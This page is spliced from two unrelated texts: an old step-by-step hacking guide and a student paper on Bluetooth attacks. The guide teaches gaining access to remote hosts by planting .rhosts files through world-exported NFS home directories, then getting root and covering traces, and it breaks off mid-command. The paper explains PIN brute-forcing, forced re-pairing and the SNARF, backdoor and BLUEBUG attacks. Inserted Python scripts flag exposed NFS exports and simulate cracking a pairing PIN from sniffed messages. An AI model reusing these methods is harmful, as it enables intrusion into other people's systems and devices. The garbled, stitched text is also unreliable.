VIEWS: 14 PAGES: 7 POSTED ON: 6/29/2012
User's guide
__________________________

Well, howdy folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything...?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
______________________

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY... ;)
I ain't responsible for any damages you made after reading this... (I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press .

Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactly for beginners, but it'll have to do.
What all hackers have to know is that there are 4 steps in hacking...
Step 1: Getting access to the site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.
Ok. In the next pages we'll see exactly what I meant.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one (no mountd answering, so nothing is
exported over NFS), then it's time to search for another way in.
What I was trying to do was to exploit an old security problem in most
SunOS systems that could allow a remote attacker to add a .rhosts to a user's
home directory... (That was possible if the site had NFS-exported its home
directories to everyone: mount the export, write a .rhosts as the victim
user, and rlogin/rsh then let you in as that user without a password.)
Let's see what happens...

mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.si
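The export list above is the whole decision point of this step, so here is an added example (not part of the original text) that parses `showmount -e` output, tells the "RPC: Program not registered" dead end apart from a real export list, and flags the exports that anyone can mount, with a separate check for home-directory exports, which is the precondition for the .rhosts trick. The function names, the `Export list for ...:` header line (what showmount prints before the entries) and the sample output are this example's own assumptions.

```python
"""Added example: classify `showmount -e` output.  Function names and the
sample output are this example's own, not the text's."""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Client specs that mean "any host may mount this export".
WORLD_CLIENTS = {"(everyone)", "*"}

# Constructed from the export list shown in the text; the "Export list for"
# header is what showmount -e prints before the entries.
SAMPLE_OUTPUT = """Export list for victim1.site.com:
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
"""


@dataclass
class Export:
    path: str
    clients: List[str] = field(default_factory=list)

    def is_world_mountable(self) -> bool:
        return any(c in WORLD_CLIENTS for c in self.clients)


def parse_showmount(output: str) -> Tuple[List[Export], Optional[str]]:
    """Return (exports, error).  error carries the RPC message when mountd is
    not reachable (e.g. 'RPC: Program not registered.'); then the NFS route
    is closed and exports is empty."""
    exports: List[Export] = []
    error: Optional[str] = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Export list for"):
            continue
        if line.startswith("RPC:") or line.startswith("clnt_create:"):
            error = line
            continue
        parts = line.split(None, 1)               # "<path> <client,client,...>"
        spec = parts[1] if len(parts) > 1 else ""
        clients = [c.strip() for c in spec.split(",") if c.strip()]
        exports.append(Export(parts[0], clients))
    return exports, error


def world_mountable(exports: List[Export]) -> List[str]:
    """Paths that every host on the network may mount."""
    return [e.path for e in exports if e.is_world_mountable()]


def exposed_home_dirs(exports: List[Export]) -> List[str]:
    """World-mountable exports holding user home directories: the
    precondition for writing a .rhosts file into a victim's home."""
    home_roots = ("/home", "/export/home", "/usr/home")
    prefixes = tuple(r + "/" for r in home_roots)
    return [p for p in world_mountable(exports)
            if p.rstrip("/") in home_roots or p.startswith(prefixes)]


if __name__ == "__main__":
    exports, err = parse_showmount(SAMPLE_OUTPUT)
    print("world-mountable:", world_mountable(exports))
    print("home dirs exposed:", exposed_home_dirs(exports))
    _, err = parse_showmount("RPC: Program not registered.\n")
    print("no mountd:", err)
```

Run it against the captured output of a real `showmount -e host`; an empty `exposed_home_dirs` result closes this route, a non-empty one is exactly the situation the text goes on to exploit.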
BLUETOOTH HACKING

PRERIT KAPADIA, ID: 185, firstname.lastname@example.org, Project ID: CV-75
ABHAS MANGAL, ID: 183, email@example.com, Project ID: CV-75

ABSTRACT

Want to immerse your handhelds, laptops or other electronic goodies in the world of Bluetooth? Better rethink, because are you really secure? Want to learn more? Then proceed ahead. Here you will take a trip through the various procedures by which many different types of attacks try their hand at capturing the personal information on your Bluetooth enabled device. But would they really succeed? Find out ahead. We walk through the three important steps of the pairing process which any Bluetooth device must follow before transferring data using a PIN, and also mention the points at which the PIN can be cracked in that initial process itself. The encryption algorithm followed during the pairing process is also discussed. Moreover, a dictionary of the different types of attacks, and of the malicious tricks they follow in order to gain control over the different services provided by Bluetooth enabled devices, is also dealt with in the paper. The various counter-measures that need to be taken in order to prevent our beloved Bluetooth devices from being hacked are suggested. The paper also brings to the centre of attention the process of scanning for Bluetooth addresses, which enables ethical hackers like us to come in contact with alien Bluetooth devices.

What is Bluetooth?

Bluetooth is a wireless technology that enables any electrical device to communicate wirelessly in the 2.4 GHz ISM (license free) frequency band. It allows devices such as mobile phones, headsets, PDAs and portable computers to communicate and send data to each other without the need for wires or cables to link the devices together. It has been specifically designed as a low cost, low power radio technology, which is particularly suited to the short range Personal Area Network (PAN) application. (It is the design focus on low cost, small size and low power which distinguishes it from the IEEE 802.11 wireless LAN technology.)

The Main Features of Bluetooth:
- Operates in the 2.4 GHz frequency band without a license for wireless communication.
- Real-time data transfer usually possible between 10-100 m.
- Close proximity not required as with infrared data (IrDA) communication devices, as Bluetooth doesn't suffer from interference from obstacles such as walls.
- Supports both point-to-point wireless connections without cables between mobile phones and personal computers, as well as point-to-multipoint connections to enable ad hoc local wireless networks.
- It uses the unlicensed ISM (Industrial, Scientific and Medical) band, 2400 - 2483.5 MHz. Modulation: Gaussian frequency shift keying. Frequency Hopping Spread Spectrum: 1600 hops/sec amongst 79 channels, spaced at 1 MHz separation.

When and How was it Conceived?

Bluetooth was originally conceived by Ericsson in 1994, when they began a study to examine alternatives to the cables that linked mobile phone accessories.

Where did the Name Come From?

Bluetooth was named after Harald Blatand (or Bluetooth), a tenth century Danish Viking king who had united and controlled large parts of Scandinavia which are today Denmark and Norway. The name was chosen to highlight the potential of the technology to unify the telecommunications and computing industries.

SIG Membership?

Since its original foundation, the Bluetooth SIG has transitioned into a not-for-profit trade association, Bluetooth SIG, Inc. Membership is open to all companies wishing to develop, market and promote Bluetooth products, at two levels - Associate and Adopter Members.

Bluetooth Security

2.1 The Bluetooth pairing & authentication process

The Bluetooth initialization procedures consist of 3 or 4 steps:
1. Creation of an initialization key (Kinit).
2. Creation of a link key (Kab).
3. Authentication.
After the 3 pairing steps are completed, the devices can derive an encryption key to hide all future communication in an optional fourth step.

Before the pairing process can begin, the PIN code must be entered into both Bluetooth devices. Note that in some devices (like wireless earphones) the PIN is fixed and cannot be changed. In such cases, the fixed PIN is entered into the peer device. If two devices both have a fixed PIN, they cannot be paired, and therefore cannot communicate. In the following sections we go into the details of the steps of the pairing process.

2.1.1 Creation of Kinit

The Kinit key is created using the E22 algorithm, whose inputs are:
1. a BD_ADDR.
2. the PIN code and its length.
3. a 128 bit random number IN_RAND.
This algorithm outputs a 128-bit word, which is referred to as the initialization key (Kinit). Figure 1 describes how Kinit is generated using E22. Note that the PIN code is available at both Bluetooth devices, and the 128 bit IN_RAND is transmitted in plaintext. As for the BD_ADDR: if one of the devices has a fixed PIN, they use the BD_ADDR of the peer device. If both have a variable PIN, they use the BD_ADDR of the slave device that receives the IN_RAND; in Figure 1, where both devices have a variable PIN, BD_ADDRB is used. A device can obtain the Bluetooth device address of its peer via an inquiry routine. This is usually done before connection establishment begins.

This initialization key (Kinit) is used only during the pairing process. Upon the creation of the link key (Kab), the Kinit key is discarded.

Figure 1: Generation of Kinit using E22

2.1.2 Creation of Kab

After creating the initialization key, the devices create the link key Kab. The devices use the initialization key to exchange two new 128 bit random words, known as LK_RANDA and LK_RANDB. Each device selects a random 128 bit word and sends it to the other device after bitwise XORing it with Kinit. Since both devices know Kinit, each device now holds both random numbers LK_RANDA and LK_RANDB. Using the E21 algorithm, both devices create the link key Kab. The inputs of the E21 algorithm are:
1. a BD_ADDR.
2. the 128 bit random number LK_RAND.
Note that E21 is used twice in each device, with two sets of inputs. Figure 2 describes how the link key Kab is created.

Figure 2: Generation of Kab using E21

2.1.3 Mutual authentication

Upon creation of the link key Kab, mutual authentication is performed. This process is based on a challenge-response scheme. One of the devices, the verifier, randomizes and sends (in plaintext) a 128 bit word called AU_RANDA. The other device, the claimant, calculates a 32 bit word called SRES using the algorithm E1. The claimant sends the 32 bit SRES word as a reply to the verifier, who verifies the response word by performing the same calculation. If the response word is correct, the verifier and the claimant change roles and repeat the entire process. Figure 3 describes the process of mutual authentication. The inputs to E1 are:
1. The random word AU_RANDA.
2. The link key Kab.
3. The claimant's own Bluetooth device address (BD_ADDRB).
Note that as a side effect of the authentication process, both peers calculate a 96 bit word called ACO. This word is optionally used during the creation of the encryption key. The creation of this encryption key exceeds our primary discussion and is not described in this paper.

Figure 3: Mutual authentication process using E1

2.2 Bluetooth cryptographic primitives

As we described above, the Bluetooth pairing and authentication process uses three algorithms: E22, E21 and E1. All of these algorithms are based on the SAFER+ cipher with some modifications. Here we describe the features of SAFER+ that are relevant to the attack.

2.2.1 Description of SAFER+

SAFER+ is a block cipher with a block size of 128 bits and three different key lengths: 128, 192 and 256 bits. Bluetooth uses SAFER+ with a 128 bit key length. In this mode, SAFER+ consists of:
1. KSA - a key scheduling algorithm that produces 17 different 128-bit subkeys.
2. 8 identical rounds.
3. An output transformation, which is implemented as an XOR between the output of the last round and the last subkey.
Figure 4 describes the inner design of SAFER+, as it is used in Bluetooth.

Figure 4: Inner design of SAFER+

The key scheduling algorithm (KSA)

The key scheduling algorithm used in SAFER+ produces 17 different 128-bit subkeys, denoted K1 to K17. Each SAFER+ round uses 2 subkeys, and the last key is used in the SAFER+ output transformation. The important details for our discussion are that in each step of the KSA, each byte is cyclically rotated left by 3 bit positions, and 16 bytes (out of 17) are selected for the output subkey. In addition, a 128 bit bias vector, different in each step, is added to the selected output bytes.

The SAFER+ Round

As depicted, SAFER+ consists of 8 identical rounds. Each round calculates a 128 bit word out of two subkeys and the 128 bit input word from the previous round.

3 Bluetooth PIN Cracking

3.1 The Basic Attack

Table 1: List of messages sent during the pairing and authentication process. "A" and "B" denote the two Bluetooth devices.

 #  Src  Dst  Data      Length   Notes
 1  A    B    IN_RAND   128 bit  plaintext
 2  A    B    LK_RANDA  128 bit  XORed with Kinit
 3  B    A    LK_RANDB  128 bit  XORed with Kinit
 4  A    B    AU_RANDA  128 bit  plaintext
 5  B    A    SRES      32 bit   plaintext
 6  B    A    AU_RANDB  128 bit  plaintext
 7  A    B    SRES      32 bit   plaintext

Assume that the attacker eavesdropped on an entire pairing and authentication process, and saved all the messages (see Table 1). The attacker can now use a brute force algorithm to find the PIN used. The attacker enumerates all possible values of the PIN. Knowing IN_RAND and the BD_ADDR, the attacker runs E22 with those inputs and the guessed PIN, and obtains a hypothesis for Kinit. The attacker can now use this hypothesis of the initialization key to decode messages 2 and 3. Messages 2 and 3 contain enough information to perform the calculation of the link key Kab, giving the attacker a hypothesis of Kab. The attacker now uses the data in the last 4 messages to test the hypothesis: using Kab and the transmitted AU_RANDA (message 4), the attacker calculates SRES and compares it to the data of message 5. If necessary, the attacker can use the values of messages 6 and 7 to re-verify the hypothesis of Kab, and repeats this for each guess until the correct PIN is found. Figure 6 describes the entire process of PIN cracking.

Figure 6: The Basic Attack Structure.

Note that the attack, as described, is only fully successful against PIN values of under 64 bits. If the PIN is longer, then with high probability there will be multiple PIN candidates, since the two SRES values only provide 64 bits of data to test against. A 64 bit PIN is equivalent to a 19 decimal digit PIN.

4 The Re-Pairing attack

4.1 Background and motivation

This section describes an additional attack on Bluetooth devices that is useful when used in conjunction with the primary attack described in Section 3. Recall that the primary attack is only applicable if the attacker has eavesdropped on the entire process of pairing and authentication. This is a major limitation, since the pairing process is rarely repeated. Once the link key Kab is created, each Bluetooth device stores it for possible future communication with the peer device. If at a later point in time the device initiates communication with the same peer, the stored link key is used and the pairing process is skipped. The second attack exploits the connection establishment protocol to force the communicating devices to repeat the pairing process. This allows the attacker to record all the messages and crack the PIN using the primary attack described in this paper.

4.2 Attack details

Assume that two Bluetooth devices that have already been paired before now intend to establish communication again. This means that they don't need to create the link key Kab again, since they have already created and stored it before. They proceed directly to the Authentication phase (recall Figure 3). We describe three different methods that can be used to force the devices to repeat the pairing process. The efficiency of each method depends on the implementation of the Bluetooth core in the device under attack. These methods appear in order of efficiency:
1. Since the devices skipped the pairing process and proceeded directly to the Authentication phase, the master device sends the slave an AU_RAND message, and expects the SRES message in return. Note that the Bluetooth specification allows a Bluetooth device to forget a link key. In such a case, the slave sends an LMP_not_accepted message in return, to let the master know it has forgotten the link key. Therefore, after the master device has sent the AU_RAND message to the slave, the attacker injects an LMP_not_accepted message toward the master. The master will be convinced that the slave has lost the link key and pairing will be restarted. Restarting the pairing procedure causes the master to discard the link key. This assures that pairing must be done before the devices can authenticate again.
2. At the beginning of the Authentication phase, the master device is supposed to send the AU_RAND to the slave. If, before it does so, the attacker injects an IN_RAND message toward the slave, the slave device will be convinced the master has lost the link key and pairing is restarted. This will cause the connection establishment to restart.
3. During the Authentication phase, the master device sends the slave an AU_RAND message, and expects an SRES message in return. If, after the master has sent the AU_RAND message, an attacker injects a random SRES message toward the master, this will cause the Authentication phase to restart, and repeated attempts will be made. At some point, after a certain number of failed authentication attempts, the master device is expected to declare that the authentication procedure has failed (implementation dependent) and initiate pairing.
4. The three methods described above cause one of the devices to discard its link key. This assures that the pairing process will occur during the next connection establishment, so the attacker will be able to eavesdrop on the entire process, and use the method described in Section 3 to crack the PIN.

In order to make the attack "online", the attacker can save all the messages transferred between the devices after the pairing is complete. After breaking the PIN (0.06-0.3 sec for a 4 digit PIN), the attacker can decode the saved messages, and continue to eavesdrop on and decode the communication on the fly. Since Bluetooth supports a bit rate of 1 Megabit per second, a 40 KB buffer is more than enough for the common case of a 4 digit PIN.

Notes:
1. The Bluetooth specification does allow devices to forget link keys and to require repeating the pairing process. This fact makes the re-pairing attack applicable.
2. Re-pairing is an active attack that requires the attacker to inject a specific message at a precise point in the protocol. This most likely needs a custom Bluetooth device, since off-the-shelf components will be unable to support such behavior.
3. If the slave device verifies that the message it receives is from the correct BD_ADDR, then the attack requires the injected message to have its source BD_ADDR "spoofed" - again requiring custom hardware.
4. If the attack is successful, the Bluetooth user will need to enter the PIN again, so a suspicious user may realize that his Bluetooth device is under attack and refuse to enter the PIN.

5 Countermeasures

This section details the countermeasures one should consider when using a Bluetooth device. These countermeasures reduce both the probability of being subjected to the two attacks and the vulnerability to them.

1. Since Bluetooth is a wireless technology, it is very difficult to keep Bluetooth signals from leaking outside the desired boundaries. Therefore, one should follow the recommendation in the Bluetooth standard and enter the PIN into the Bluetooth device for pairing as rarely as possible. This reduces the risk of an attacker eavesdropping on the pairing process and finding the PIN used. Most Bluetooth devices save the link key (Kab) in non-volatile memory for future use. This way, when the same Bluetooth devices wish to communicate again, they use the stored link key. However, there is another mode of operation, which requires entering the PIN into both devices every time they wish to communicate, even if they have already been paired before. This mode gives a false sense of security! Starting the pairing process every time increases the probability of an attacker eavesdropping on the messages transferred. We suggest not using this mode of operation.
2. The PIN length ranges from 8 to 128 bits. Most manufacturers use a 4 digit PIN and supply it with the device. Obviously, customers should demand the ability to use longer PINs.
3. Instead of passing the pairing messages in plaintext, they should be encrypted before transmission, so that a passive eavesdropper is not handed everything needed to test PIN guesses offline.

The Future of Bluetooth

The next version of Bluetooth, currently code named Lisbon (shipped as Bluetooth 2.1 + EDR), includes a number of features to increase the security, usability and value of Bluetooth. The following features are defined:
- Atomic Encryption Change
- Extended Inquiry Response
- Sniff Subrating
- QoS Improvements
- Simple Pairing

Types of attacks in Bluetooth

The SNARF attack:
It is possible, on some makes of device, to connect to the device without alerting the owner of the target device of the request, and gain access to restricted portions of the data stored therein, including the entire phonebook (and any images or other data associated with the entries), calendar, realtime clock, business card, properties, change log and IMEI (International Mobile Equipment Identity, which uniquely identifies the phone to the mobile network, and is used in illegal phone 'cloning'). This is normally only possible if the device is in "discoverable" or "visible" mode, but there are tools available on the Internet that allow even this safety net to be bypassed.

The BACKDOOR attack:
The backdoor attack involves establishing a trust relationship through the "pairing" mechanism, but ensuring that it no longer appears in the target's register of paired devices. In this way, unless the owner is actually observing their device at the precise moment a connection is established, ... device grants access to services. This means that not only can data be retrieved from the phone, but other services, such as modems or Internet, WAP and GPRS gateways, may be accessed without the owner's knowledge or consent. Indications are that once the backdoor is installed, the above SNARF attack will function on devices that previously denied access, and without the restrictions of a plain SNARF attack, so we strongly suspect that the other services will prove to be available also.

The BLUEBUG attack:
The bluebug attack creates a serial profile connection to the device, thereby giving full access to the AT command set, which can then be exploited using standard off-the-shelf tools, such as PPP for networking and gnokii for messaging, contact management, diverts and initiating calls. With this facility, it is possible to use the phone to initiate calls to premium rate numbers, send SMS messages, read SMS messages, connect to data services such as the Internet, and even monitor conversations in the vicinity of the phone. The latter is done via a voice call over the GSM network, so the listening post can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, allowing the owner's incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim.

Scanning for Bluetooth addresses

The Bluetooth address itself is a unique 48 bit device identifier, where the first 3 bytes of the address are assigned to a specific manufacturer by the IEEE (www.ieee.org/), and the last 3 bytes are freely allocated by the manufacturer. For example, the hexadecimal representation of a Sony Ericsson P900 phone's Bluetooth address may look like 00:0A:D9:EB:66:C7, where the first 3 bytes of this address (00:0A:D9) are registered to Sony Ericsson by the IEEE, meaning that all P900 phones will have a Bluetooth address starting with the same 3 bytes. The last 3 bytes (EB:66:C7) of the sample address are assigned to this device by Sony Ericsson and should be different for each P900 phone -- but are not always, unfortunately.

In theory, enabling the non-discoverable mode on a Bluetooth device should protect users from unauthorized connections, yet in practice it is still quite possible to find these devices. There are software tools available which allow brute-force discovery of non-discoverable devices. An example of such an application is RedFang by Ollie Whitehouse, a small application which simply tries to connect to each Bluetooth address one by one, until finally a hidden device answers the request sent to its particular address. The author's initial tests needed a minimum of 6 seconds per address to achieve a good level of accuracy (it varies from 2.5 to 10 seconds, on average). It is certainly possible to find a hidden device in less than 3 seconds. The address space used by Sony Ericsson has 16,777,216 possible addresses. If we assume 6 seconds are required per address, the total scan would take 1165 days, meaning we would need more than 3 years to discover all hidden Sony Ericsson phones in a conference room.

Conclusion:

With the advancement of digital convergence on M-commerce, usage of Bluetooth in connecting different devices is going to be significant. But to make communication more secure, advancement in the prospect of security must not be neglected.
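The seven messages of Table 1 and the basic attack of Section 3.1, modelled end to end as an added example; this is not code from the original paper or from the Bluetooth specification. The real E22, E21 and E1 are SAFER+ based; this model replaces each with an HMAC-SHA256 stand-in of the same shape (same inputs, 128-bit keys, 32-bit SRES), which is an assumption of the example and is what makes the search finish in well under a second here. The protocol structure and the attacker's logic are the paper's: guess a PIN, derive Kinit from IN_RAND and BD_ADDRB, strip Kinit from messages 2 and 3 to get Kab, test against message 5, re-verify with messages 6 and 7. The device addresses are constructed (A uses the P900 sample address from the text, B is made up), and the function names are this example's own.

```python
"""Added example: the Table 1 pairing exchange and the Section 3.1 PIN
brute force.  E22/E21/E1 are SAFER+-based in Bluetooth; the HMAC-SHA256
stand-ins below are an assumption of this model, not the real primitives."""
import hashlib
import hmac
import os


def _prf(label: bytes, key: bytes, *parts: bytes) -> bytes:
    # Stand-in PRF with the same input/output shape as the Bluetooth E-functions.
    return hmac.new(key, label + b"".join(parts), hashlib.sha256).digest()


def e22(bd_addr: bytes, pin: bytes, in_rand: bytes) -> bytes:
    """Kinit = E22(BD_ADDR, PIN, len(PIN), IN_RAND); 128-bit output."""
    return _prf(b"E22", pin + bytes([len(pin)]), bd_addr, in_rand)[:16]


def e21(bd_addr: bytes, lk_rand: bytes) -> bytes:
    """One E21 evaluation: a 128-bit contribution to the link key."""
    return _prf(b"E21", lk_rand, bd_addr)[:16]


def e1(kab: bytes, au_rand: bytes, bd_addr: bytes) -> bytes:
    """SRES = E1(Kab, AU_RAND, claimant's BD_ADDR); 32-bit output (ACO dropped)."""
    return _prf(b"E1", kab, au_rand, bd_addr)[:4]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def link_key(addr_a, addr_b, lk_rand_a, lk_rand_b):
    # Each device runs E21 twice (one per address/random pair) and combines them.
    return xor(e21(addr_a, lk_rand_a), e21(addr_b, lk_rand_b))


def pair(addr_a, addr_b, pin):
    """Run messages 1-7 of Table 1; return what a sniffer sees, plus Kab."""
    in_rand = os.urandom(16)
    # Both PINs variable, so E22 uses the address of the slave (B) that received IN_RAND.
    kinit = e22(addr_b, pin, in_rand)
    lk_rand_a, lk_rand_b = os.urandom(16), os.urandom(16)
    kab = link_key(addr_a, addr_b, lk_rand_a, lk_rand_b)
    au_rand_a, au_rand_b = os.urandom(16), os.urandom(16)
    messages = [
        ("A", "B", "IN_RAND", in_rand),                    # 1: plaintext
        ("A", "B", "LK_RANDA", xor(lk_rand_a, kinit)),     # 2: XORed with Kinit
        ("B", "A", "LK_RANDB", xor(lk_rand_b, kinit)),     # 3: XORed with Kinit
        ("A", "B", "AU_RANDA", au_rand_a),                 # 4: A verifies B
        ("B", "A", "SRES", e1(kab, au_rand_a, addr_b)),    # 5: B is the claimant
        ("B", "A", "AU_RANDB", au_rand_b),                 # 6: roles swap
        ("A", "B", "SRES", e1(kab, au_rand_b, addr_a)),    # 7: A is the claimant
    ]
    return messages, kab


def kab_hypothesis(addr_a, addr_b, messages, pin):
    """Attacker side: derive Kab from the sniffed messages under a PIN guess."""
    in_rand, m2, m3 = messages[0][3], messages[1][3], messages[2][3]
    kinit = e22(addr_b, pin, in_rand)
    return link_key(addr_a, addr_b, xor(m2, kinit), xor(m3, kinit))


def crack_pin(addr_a, addr_b, messages, max_digits=4):
    """Enumerate decimal PINs of 1..max_digits digits; return every PIN whose
    Kab hypothesis reproduces both SRES values (messages 5 and 7).  With short
    PINs exactly one survives; the paper's 64-bit caveat is why a list is kept."""
    au_rand_a, sres_b = messages[3][3], messages[4][3]
    au_rand_b, sres_a = messages[5][3], messages[6][3]
    survivors = []
    for n_digits in range(1, max_digits + 1):
        for value in range(10 ** n_digits):
            pin = str(value).zfill(n_digits).encode()
            kab = kab_hypothesis(addr_a, addr_b, messages, pin)
            if e1(kab, au_rand_a, addr_b) != sres_b:   # test against message 5
                continue
            if e1(kab, au_rand_b, addr_a) != sres_a:   # re-verify with 6 and 7
                continue
            survivors.append(pin.decode())
    return survivors


if __name__ == "__main__":
    # Constructed addresses: A is the P900 sample from the text, B is made up.
    ADDR_A = bytes.fromhex("000AD9EB66C7")
    ADDR_B = bytes.fromhex("000AD9000001")
    sniffed, real_kab = pair(ADDR_A, ADDR_B, b"1234")
    found = crack_pin(ADDR_A, ADDR_B, sniffed)
    print("PIN candidates:", found)
    recovered = kab_hypothesis(ADDR_A, ADDR_B, sniffed, found[0].encode())
    print("link key recovered:", recovered == real_kab)
```

Everything the attacker function consumes is in the `messages` list, which is exactly what Table 1 says goes over the air, and only the two 32-bit SRES values act as the oracle; with the real SAFER+ primitives the per-guess cost is higher but the loop is the same, which is why the paper's timing for a 4 digit PIN is a fraction of a second.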